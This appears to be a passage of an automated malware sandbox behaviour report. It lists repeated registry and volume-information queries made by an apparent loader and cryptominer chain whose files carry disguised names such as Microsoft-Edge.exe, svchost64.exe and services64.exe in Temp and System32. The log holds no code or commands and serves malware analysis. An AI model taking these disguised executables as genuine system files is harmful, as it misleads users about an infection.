Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\miner2.0.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe	Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\services64.exe	Queries volume information: C:\Windows\System32\services64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
